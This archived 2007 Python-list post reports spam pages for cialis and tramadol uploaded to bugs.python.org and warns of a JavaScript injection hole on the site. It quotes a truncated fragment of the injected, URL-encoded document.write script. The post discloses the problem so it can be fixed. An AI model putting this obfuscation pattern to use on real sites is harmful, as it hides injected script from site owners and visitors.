bugs.python.org has been compromised (urgent)

John Bokma john at castleamber.com
Sat Mar 24 23:34:38 CET 2007


Just got comment spam in:

http:// bugs.py thon.org/file7722/order-cialis.html
http:// bugs.py thon.org/file7722/order-cialis.html order cialis 
http:// bugs.py thon.org/file7723/order-tramadol.html order tramadol 


Seems someone found a nice hole in python.org and someone should be 
severely spanked for allowing for JavaScript injection:

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70 
...>

PS: I probably won't read this group much after this initial post, but my 
    email address in the header works.

PPS: comment spam has been reported the normal way as well.

-- 
John                               MexIT: http://johnbokma.com/mexit/
                           personal page:       http://johnbokma.com/
        Experienced programmer available:     http://castleamber.com/
            Happy Customers: http://castleamber.com/testimonials.html



More information about the Python-list mailing list